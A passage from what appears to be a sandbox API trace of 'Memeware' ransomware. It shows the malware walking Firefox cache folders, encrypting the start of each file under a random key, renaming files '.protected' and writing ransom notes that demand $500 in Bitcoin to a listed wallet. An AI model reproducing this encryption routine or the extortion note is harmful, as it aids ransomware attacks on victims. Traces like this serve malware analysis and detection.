lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0086.350] lstrlenA 
(lpString="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") returned 684 [0086.350] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.350] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.351] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0086.351] CloseHandle (hObject=0x15c) returned 1 [0086.351] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0086.351] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0086.351] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\RESTORE_FILES.txt") returned 115 [0086.351] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\e\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.351] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.351] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0086.352] lstrlenA (lpString="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") returned 684 [0086.352] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 
[0086.352] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.352] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0086.352] CloseHandle (hObject=0x158) returned 1 [0086.353] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.353] lstrcmpiW (lpString1="F", lpString2="Windows") returned -1 [0086.353] lstrcmpiW (lpString1="F", lpString2="Program Files") returned -1 [0086.354] lstrcmpiW (lpString1="F", lpString2="Program Files (x86)") returned -1 [0086.354] lstrcmpiW (lpString1="F", lpString2="$Recycle.bin") returned 1 [0086.354] lstrcmpiW (lpString1="F", lpString2="System Volume Information") returned -1 [0086.354] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F") returned 97 [0086.354] lstrcmpW (lpString1="F", lpString2=".") returned 1 [0086.354] lstrcmpW (lpString1="F", lpString2="..") returned 1 [0086.354] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\*") returned 99 [0086.354] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0086.355] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.355] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.355] lstrcmpiW 
(lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.355] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.355] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.355] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\.") returned 99 [0086.355] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.355] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.355] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.355] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.355] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.355] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.355] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.355] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\..") returned 100 [0086.355] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.355] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.355] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.355] lstrcmpiW (lpString1="23", lpString2="Windows") returned -1 [0086.355] lstrcmpiW (lpString1="23", lpString2="Program Files") returned -1 [0086.355] lstrcmpiW (lpString1="23", lpString2="Program Files (x86)") returned -1 [0086.355] lstrcmpiW (lpString1="23", lpString2="$Recycle.bin") returned 1 [0086.355] lstrcmpiW (lpString1="23", lpString2="System Volume Information") returned -1 [0086.355] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23") returned 100 [0086.355] lstrcmpW (lpString1="23", lpString2=".") returned 1 [0086.355] lstrcmpW (lpString1="23", lpString2="..") returned 1 [0086.356] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\*") returned 102 [0086.356] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0086.356] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.356] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.356] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.356] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.356] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.356] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\.") returned 102 [0086.356] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.356] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.356] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.356] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.356] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.356] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.356] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.356] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\..") returned 103 [0086.356] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.356] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.356] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.357] lstrcmpiW (lpString1="7E0FEd01", lpString2="Windows") returned -1 [0086.357] lstrcmpiW (lpString1="7E0FEd01", lpString2="Program Files") returned -1 [0086.357] lstrcmpiW (lpString1="7E0FEd01", lpString2="Program Files (x86)") returned -1 [0086.357] lstrcmpiW (lpString1="7E0FEd01", lpString2="$Recycle.bin") returned 1 [0086.357] lstrcmpiW (lpString1="7E0FEd01", lpString2="System Volume Information") returned -1 [0086.357] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\7E0FEd01") returned 109 [0086.357] StrStrIW (lpFirst="7E0FEd01", lpSrch=".protected") returned 0x0 [0086.357] lstrcmpW (lpString1="7E0FEd01", lpString2="RESTORE_FILES.txt") returned -1 [0086.357] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0086.357] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0086.357] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\7E0FEd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\23\\7e0fed01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0086.357] 
lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\7E0FEd01") returned 109 [0086.357] StrStrW (lpFirst="7E0FEd01", lpSrch=".txt") returned 0x0 [0086.357] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\7E0FEd01") returned 109 [0086.357] StrStrW (lpFirst="7E0FEd01", lpSrch=".rar") returned 0x0 [0086.357] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\7E0FEd01") returned 109 [0086.357] StrStrW (lpFirst="7E0FEd01", lpSrch=".zip") returned 0x0 [0086.358] ReadFile (in: hFile=0x160, lpBuffer=0xcf0090, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.359] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.359] WriteFile (in: hFile=0x160, lpBuffer=0xcf0090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.359] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.359] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0086.359] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0086.359] CloseHandle (hObject=0x160) 
returned 1 [0086.360] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\7E0FEd01.protected") returned 119 [0086.360] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\7E0FEd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\23\\7e0fed01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\7E0FEd01.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\23\\7e0fed01.protected")) returned 1 [0086.360] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0086.360] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0086.360] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\RESTORE_FILES.txt") returned 118 [0086.361] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\23\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0086.361] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.361] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0086.362] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.362] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.362] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.362] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0086.362] CloseHandle (hObject=0x15c) returned 1 [0086.362] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.362] lstrcmpiW (lpString1="F0", lpString2="Windows") returned -1 [0086.362] lstrcmpiW (lpString1="F0", lpString2="Program Files") returned -1 [0086.362] lstrcmpiW (lpString1="F0", lpString2="Program Files (x86)") returned -1 [0086.362] lstrcmpiW (lpString1="F0", lpString2="$Recycle.bin") returned 1 [0086.362] lstrcmpiW (lpString1="F0", lpString2="System Volume Information") returned -1 [0086.362] wnsprintfW 
(in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0") returned 100 [0086.362] lstrcmpW (lpString1="F0", lpString2=".") returned 1 [0086.362] lstrcmpW (lpString1="F0", lpString2="..") returned 1 [0086.362] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\*") returned 102 [0086.362] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0086.363] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.363] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.363] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.363] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.363] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.363] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\.") returned 102 [0086.363] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.363] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.363] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.363] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.363] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.363] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.363] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.363] 
wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\..") returned 103 [0086.363] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.363] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.363] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.363] lstrcmpiW (lpString1="ECB2Dd01", lpString2="Windows") returned -1 [0086.363] lstrcmpiW (lpString1="ECB2Dd01", lpString2="Program Files") returned -1 [0086.363] lstrcmpiW (lpString1="ECB2Dd01", lpString2="Program Files (x86)") returned -1 [0086.363] lstrcmpiW (lpString1="ECB2Dd01", lpString2="$Recycle.bin") returned 1 [0086.363] lstrcmpiW (lpString1="ECB2Dd01", lpString2="System Volume Information") returned -1 [0086.363] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\ECB2Dd01") returned 109 [0086.363] StrStrIW (lpFirst="ECB2Dd01", lpSrch=".protected") returned 0x0 [0086.363] lstrcmpW (lpString1="ECB2Dd01", lpString2="RESTORE_FILES.txt") returned -1 [0086.363] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0086.364] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0086.364] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\ECB2Dd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\f0\\ecb2dd01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0086.364] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\ECB2Dd01") returned 109 [0086.364] StrStrW (lpFirst="ECB2Dd01", lpSrch=".txt") returned 0x0 [0086.364] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\ECB2Dd01") returned 109 [0086.364] StrStrW (lpFirst="ECB2Dd01", lpSrch=".rar") returned 0x0 [0086.364] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\ECB2Dd01") returned 109 [0086.364] StrStrW (lpFirst="ECB2Dd01", lpSrch=".zip") returned 0x0 [0086.364] ReadFile (in: hFile=0x160, lpBuffer=0xcf0090, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.393] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.394] WriteFile (in: hFile=0x160, lpBuffer=0xcf0090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.394] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.394] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0086.394] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, 
